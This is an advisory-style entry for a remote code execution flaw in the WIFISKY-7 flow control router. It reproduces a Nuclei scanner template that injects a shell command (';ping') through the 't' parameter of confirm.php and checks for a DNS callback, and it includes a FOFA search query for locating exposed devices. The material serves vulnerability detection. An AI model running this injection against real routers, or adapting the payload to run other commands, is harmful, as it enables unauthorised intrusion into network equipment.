wifisky7-rce: WIFISKY-7 Layer Flow Control Router - Remote Code Execution

日期: 2025-08-01 | 影响软件: wifisky7 | POC: 已公开

漏洞描述

There is an RCE vulnerability in the confirm.php interface of WIFISKY-7 layer flow control router

PoC代码[已公开]

id: wifisky7-rce

info:
  name: WIFISKY-7 Layer Flow Control Router - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    There is an RCE vulnerability in the confirm.php interface of WIFISKY-7 layer flow control router
  reference:
    - https://github.com/wy876/POC/blob/main/WIFISKY-7%E5%B1%82%E6%B5%81%E6%8E%A7%E8%B7%AF%E7%94%B1%E5%99%A8confirm.php%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="WIFISKY 7层流控路由器"
  tags: wifisky,rce,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/notice/confirm.php?t=%3bping+-c+3+{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: header
        words:
          - "L7Engine"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009ab0da509a093236eb58aa579e1f70e4434af5731f5c6b6939281181cc0c4c640221008a5f19d5d788768651db4564bf3befd7753ade17193d7b323334c148251e0bdf:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/wifisky7-rce.yaml